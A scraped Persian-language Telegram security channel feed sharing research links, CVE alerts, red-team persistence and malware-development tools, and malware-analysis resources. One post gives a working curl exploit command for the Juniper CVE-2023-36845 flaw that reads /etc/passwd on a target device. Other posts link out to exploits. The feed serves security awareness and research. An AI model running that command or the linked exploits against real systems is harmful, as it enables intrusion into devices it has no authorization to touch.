Network Security Channel – Telegram
Network Security Channel
2.56K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
#Web #Developer VS #Web #Security #Expert
تفاوت نگاه یک برنامه نویس وب به موضوع امنیت سرویس های تحت وب، با یک متخصص پیشرفته امنیت وب در این است که برنامه نویس وب، آسیب پذیری های عمومی را مورد بررسی و ایمن سازی قرار میدهد اما متخصص امنیت وب بیش از 100 آسیب پذیری حساس در حوزه وب رو مورد بررسی و وا کاوی قرار میدهد.

نمونه ای از تحقیقات برتر متخصصین امنیت وب:

Abusing HTTP hop-by-hop request headers by Nathan Davison

Web Cache Deception Attack by Omer Gil

HTTP Desync Attacks: Request Smuggling Reborn by James Kettle

File Operation Induced Unserialization via the “phar://” Stream Wrapper by Sam Thomas

Remote Code Execution in CouchDB by Max Justicz

Prototype pollution attack in NodeJS application by Olivier Arteau

A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! by Orange Tsai

Timeless Timing Attacks by Tom Van Goethem & Mathy Vanhoef

How I Hacked Microsoft Teams and got $150,000 in Pwn2Own by Masato Kinugawa

@Engineer_Computer
#فوری
کسی اینجا از کرمانشاه هست ؟
بهم اطلاع بده
@pooran_x
برخی بدافزارها و لودر ها ؛ برای اجرا نیاز به CRT یا همان کتابخانه های زمان اجرای C دارند.
نصب ویژوال استودیو یا انتقال فایل، مخاطرات خود را دارد .
استفاده از تکنیک استاتیک لینک ، هکر را قادر می‌سازد کد مخرب خود را در هر محیطی به اجرا بگذارد.
https://captmeelo.com/redteam/maldev/2022/10/17/independent-malware.html

@Engineer_Computer
۳۰ عدد موتور جستجوی امنیت
@Engineer_Computer
⭕️آسیب پذیری با شماره CVE-2023-29357 برای Microsoft SharePoint Server ثبت شده که اکسپلویت اون در گیت هاب در دسترس است.
تارگت های زیادی در ایران آسیب پذیر هستند، لطفا بروزرسانی کنید.


https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam
@Engineer_Computer
Weak passwords = easy targets.

83% of hacked passwords meet complexity standards, but here's the catch: attackers have BILLIONS of stolen credentials.

Is your organization prepared? Discover the defenses you need➡️ https://thehackernews.com/2023/09/are-you-willing-to-pay-high-cost-of.html

@Engineer_Computer
👍1
info
AI Vulnerability Database:
An open-source, extensible knowledge base of AI failures
https://avidml.org

@Engineer_Computer
1
#Tools #MalwareAnalysis

▪️
Automated Linux Malware Analysis Sandbox

ELFEN is a dockerized sandbox for analyzing Linux (file type: ELF) malware. It leverages an array of open-source technologies to perform both static and dynamic analysis. Results are available through both the GUI and API.

@Engineer_Computer
۴ ترابایت دیتای ایرانسل لیک شده ؟🤦‍♂
🤣4🤯3😢2
⭕️Juniper Web Device Manager - RCE
CVE-2023-36845



curl "http://xxxx:xxxx/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' -X POST

Nuceli Template :
https://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu

#CVE #Juniper
@Engineer_Computer
⭕️اگر به توسعه ابزار های Persistence در ویندوز علاقه مندید ابزاری با زبان C# نوشته شده که امکاناتی دارد.
در ابتدا میتوانیم به صورت مستقل و یا execute assembly اجرا کنیم.
در ادامه تکنیک هایی که میتوان از آن استفاده کرد در این ابزار شامل موارد زیر است:
‏Eventviewer
‏Startup
‏Autologon
‏Screensaver
‏Powershell Profile
‏WMI
‏Schedule
‏Winlogon
‏Extension Hijacking

https://github.com/mertdas/RedPersist/tree/main
#RedTeam #persist
@Engineer_Computer
⭕️ SQL injection to RCE

در این مقاله هکر سعی میکنه باگ sqli رو به یک باگ خطرناک تر تبدیل کنه.

پیلود های استفاده شده در این مقاله دو نوع هستند:
1. در اولین پیلود سعی داره یک شل روی سرور اپلود کنه و با استفاده از اون دستورات رو روی سرور اجرا کنه.

2. در پیلود دوم سعی میکنه با استفاده از باگی که گرفته از قبل اطلاعات حساس در فایل های روی سیستم رو بخونه.

لینک مقاله:

🔗 https://bit.ly/sqli-to-rce-sep-28-2023

#RCE #SQLi
@Engineer_Computer
۷۰ ساعت دوره آموزشی هکر قانونمند
با ۳۶ آزمایش
از سیسکو
رایگان

https://skillsforall.com/course/ethical-hacker?courseLang=en-USو

@Engineer_Computer
🔥2
SQL authentication bypass .pdf
63.9 KB
برنامه نویسان و WAF کاران محترم

پارامتر های این مستند علیه شما برای محیط SQL استفاده می‌شود، توجه داشته باشید
@Engineer_Computer
👍4👎1
#Video #MalwareAnalysis

▪️Reversing in action: Golang malware used in the SolarWinds attack. Part 1 and Part 2

در این دو ویدیو به تحلیل بدافزاری که در زبان برنامه نویسی Go نوشته شده بود و در حمله به SolarWinds استفاده شد، پرداخته میشود.

@Engineer_Computer